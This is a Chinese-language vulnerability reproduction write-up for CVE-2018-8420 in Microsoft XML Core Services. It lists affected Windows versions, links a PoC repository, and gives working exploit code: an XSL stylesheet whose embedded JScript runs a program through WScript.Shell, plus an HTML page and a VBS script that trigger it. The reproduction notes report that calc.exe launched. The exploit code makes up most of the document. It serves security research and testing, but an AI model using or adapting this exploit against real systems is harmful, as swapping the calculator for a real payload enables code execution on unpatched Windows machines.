影响的 Windows 版本:
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 Version 1803 for 32-bit Systems
Microsoft Windows 10 Version 1803 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 10 version 1709 for 32-bit Systems
Microsoft Windows 10 version 1709 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for 64-bit Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 1709
Microsoft Windows Server 1803
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
漏洞复现:
本地测试版本:Microsoft Windows Server 2008 R2 Datacenter
Poc 地址:https://github.com/Sch01ar/CVE-2018-8420
xml,调用计算器
1 <?xml version='1.0'?> 2 <stylesheet 3 xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" 4 xmlns:user="placeholder" 5 version="1.0"> 6 <output method="text"/> 7 <ms:script implements-prefix="user" language="JScript"> 8 <![CDATA[ 9 var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 10 ]]> </ms:script> 11 </stylesheet>
html
<script type="text/vbscript">
Sub POC()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
POC()
</script>
vbs
Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()
打开 xml.html
点击,是
点击,是
成功弹出了计算器
直接运行 xml.vbs
也成功弹出了计算器